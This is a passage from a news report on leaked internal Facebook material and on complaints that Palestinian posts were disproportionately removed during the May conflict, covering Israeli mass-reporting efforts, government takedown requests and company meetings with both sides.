In spite of the widespread perception of disproportionate silencing of Palestinian voices, Facebook has been unable to identify any “ongoing systemic issues” with its automated content removal tools or human content moderators, according to a post to Facebook’s internal message board by the company’s risk and response team.

Facebook spokesperson Andy Stone acknowledged in an interview there had been “several issues” that affected people’s ability to share on the company’s apps. “While we have fixed them, they should never have happened in the first place and we’re sorry to anyone who felt they couldn’t bring attention to important events, or who felt this was a deliberate suppression of their voice. This was never our intention – nor do we ever want to silence a particular community or point of view.”

Stone declined to comment on the leaked material indicating reputation and ad sales damage in the Middle East but did not dispute its contents.

Growth potential

The Middle East is not a huge market in terms of Facebook’s overall advertising revenue, which topped $84 billion in 2020. According to research by the Dubai-based digital advertising company Futuretech, the social media company generates between $800 million and $1 billion in annual advertising revenue in the region. But it is a key growth market at a time when user growth in some of the larger advertising markets such as the United States and Europe has stalled, experts say.

“It might be a smaller market. But Facebook is still growing aggressively in the region. So it’s strategically important,” Futuretech CEO Boye Balogun said. “They are also protecting themselves from the likes of TikTok that have launched in the region and are growing very quickly.”

The same leaked presentation highlighted a surge in Israeli users reporting problematic content on Instagram, first reported by BuzzFeed News, making Israel the top country ranked globally for reporting content for ties to dangerous organizations and individuals, a category that covers terrorist propaganda, between April and May.

There was also an increase in reports from users in Israel of content for violating Facebook’s rules against hate speech and incitement of violence. Between May 8 and May 18, users in Israel reported 494,463 cases of hate speech while Palestinian users reported 58,618 cases.

“Israel has hacked the system and knows how to pressure Facebook to take stuff down,” said Ashraf Zeitoon, who worked as Facebook’s head of policy in the Middle East and North Africa between 2014 and 2017. “Palestinians don’t have the capacity, experience and resources to report hate speech by Israeli citizens in Hebrew.”

The U.S., Israel and the European Union have designated Hamas as a terrorist organization. But pro-Palestinian civil society groups including 7amleh and Access Now as well as some Facebook employees are concerned that nonviolating content is being marked as terrorist propaganda and hate speech. They believe that Israel is flooding Facebook with reports of violations in a way that disproportionately removes Palestinian voices.

“The Israeli government is spending millions on digital tools and campaigns targeting social media content. But there are only fragmented efforts from the Palestinian side,” said Mona Shtaya from 7amleh, a nonprofit that focuses on Palestinians’ digital rights.

Shtaya notes that the Israeli government’s cyber unit makes thousands of requests each year to have content taken down from social media sites, including Facebook and Instagram. During the first 10 days of May, as Israeli-Palestinian tensions were rising, the Israeli government asked social media companies to delete more than 1,010 pieces of content. More than half (598) of the requests were made to Facebook and the Israeli government said that the social media company removed 48 percent of them. Israel also funds a program that pays students to post and report content on social media in what is described as “online public diplomacy.”

Shtaya also points to apps such as Act-IL, developed by former Israeli intelligence officers, where volunteers coordinate campaigns to mass report items of content and boost other items by liking and sharing them. Act-IL has been promoted by the Israeli government, but the company denies any formal relationship and in 2018 told BuzzFeed News that it was a “grassroots initiative” that fights antisemitism and incitement to terrorism and violence.

Long history

Free speech and human rights groups have for years accused Facebook of censoring Palestinian voices, including activists and journalists.

In November 2016, members of Palestinian solidarity groups including the Jewish Voice for Peace, the Institute for Middle East Understanding and the Palestinian Business Committee for Peace and Reform met with Facebook employees at the company’s Menlo Park, California, headquarters to discuss concerns that Palestinian activists were being silenced and allegations that Israel was trying to game the system using its network of paid students.

According to notes taken at the meeting, reviewed by NBC News, the Palestinian solidarity groups had a key takeaway: “It doesn’t feel like Facebook is taking us or the issue seriously enough. Facebook continues to defend problematic policies and we need to continue educating them about how these policies harm their stated goals of ‘promoting free expression’ and ‘making sure all users are treated the same.’” Facebook spokesperson Stone declined to comment on the 2016 meeting.

But pressure on Facebook has intensified this month as reports of such censorship collected by digital rights groups including Access Now and 7amleh have skyrocketed. They point to hundreds of examples, including Instagram removing posts and blocking hashtags about Al Aqsa, one of Islam’s holiest mosques, because its content moderation system mistakenly connected the name to a terrorist organization.

Facebook has also been attempting to crack down on extremist Israeli content, including more than a hundred WhatsApp groups — identified by The New York Times and FakeReporter, an Israeli watchdog that studies misinformation — where members call for and plan violent attacks on Palestinians.

A WhatsApp spokeswoman confirmed that it had removed some of the accounts of people in the groups and that, although it cannot read the encrypted messages sent through its service, it takes action to “ban accounts that we believe may be involved in causing imminent harm.”

This week, concerns were elevated in Washington, D.C., by Rep. Rashida Tlaib, D-Mich., who called for Facebook and other social media companies to stop censoring Palestinian political speech on their platforms.

“It is not enough to continue to blame technical errors and automated systems and algorithms,” she wrote in a letter to Facebook, Twitter and TikTok.

Making changes

Internally, the leaked posts show that a group of about 30 Facebook employees have volunteered their time to file what Facebook refers to as “Oops tickets,” a system that allows employees to flag problems to prioritize, connected to issues related to the Israeli-Palestinian conflict, and many of these have been about pro-Palestinian content believed to have been removed by mistake.

Facebook has also set up an Integrity Product Operations Center, comprising native Arabic and Hebrew speakers and subject matter experts from teams including threat intelligence, data science, operations, research, policy and legal to handle issues related to the conflict, including restoring content that has been mistakenly removed.

Facebook has regular meetings with senior members of the Israeli government, including one May 13 with Israeli Justice Minister Benny Gantz, during which he pressured Facebook to be more proactive in taking action against “extremist elements that are seeking to do damage to our country,” according a statement released by his office.

But on May 13, senior Facebook executives including Nick Clegg, vice president for global affairs and communications, Joel Kaplan, vice president of global public policy, and MENA policy chief Azzam Alameddin met virtually with Palestinian Prime Minister Mohammad Shtayyeh — the first such meeting to have taken place. Previously members of the Palestinian government and civil society groups had met with Facebook employees, Facebook spokesman Stone said. However Palestinian politicians and civil society groups have never before had access to such senior executives, 7amleh’s Mona Shtaya said.

“Facebook started by saying they felt sorry for Palestinians and what was happening on the ground,” said Shtaya, who attended the meeting with the Palestinian prime minister representing civil society. “The feeling from the meeting was that Facebook came to prove to people that they aren’t biased and that they are not only sitting with the Israeli government but also the Palestinian government.”

The group spent some time discussing words regularly used by Palestinians, including “martyr” and “resistance” that were being labeled by Facebook as hate speech or incitement to violence.

“They showed openness, they acknowledged some mistakes, and promised to take these points into consideration,” said Shtaya, who said that the meeting went “really well.”

Stone said that the meetings with Gantz and Shtayyeh were “an effort to ensure that all parties are aware of steps the company has taken, and will continue to take, to keep the platform safe.”

On Wednesday, Facebook representatives met with pro-Palestinian and free speech civil society groups, including the Electronic Frontier Foundation and Access Now, to discuss the same issues.

Access Now’s Marwa Fatafta said the meeting was arranged after they sent an email to Facebook CEO Mark Zuckerberg, hoping to sit down with executive leadership. Instead they met with Facebook’s human rights policy team and asked for a public audit of the company’s content policies related to the Israeli-Palestinian issue.

Fatafta came away thinking that the Facebook attendees were well-intentioned, but lacked power to effect meaningful change.

“I am always skeptical whenever their human rights team wants to meet with us. We know they have not so much influence within the organization,” Fatafta said. “I always feel their job is to manage down civil society and their concerns. But they don’t do much when it comes to actual structural changes.”

Stone said that the meeting was an “important opportunity to hear their concerns directly” and that “we share an interest in making sure Facebook remains a place for Palestinians and others around the world to discuss the issues that matter to them.”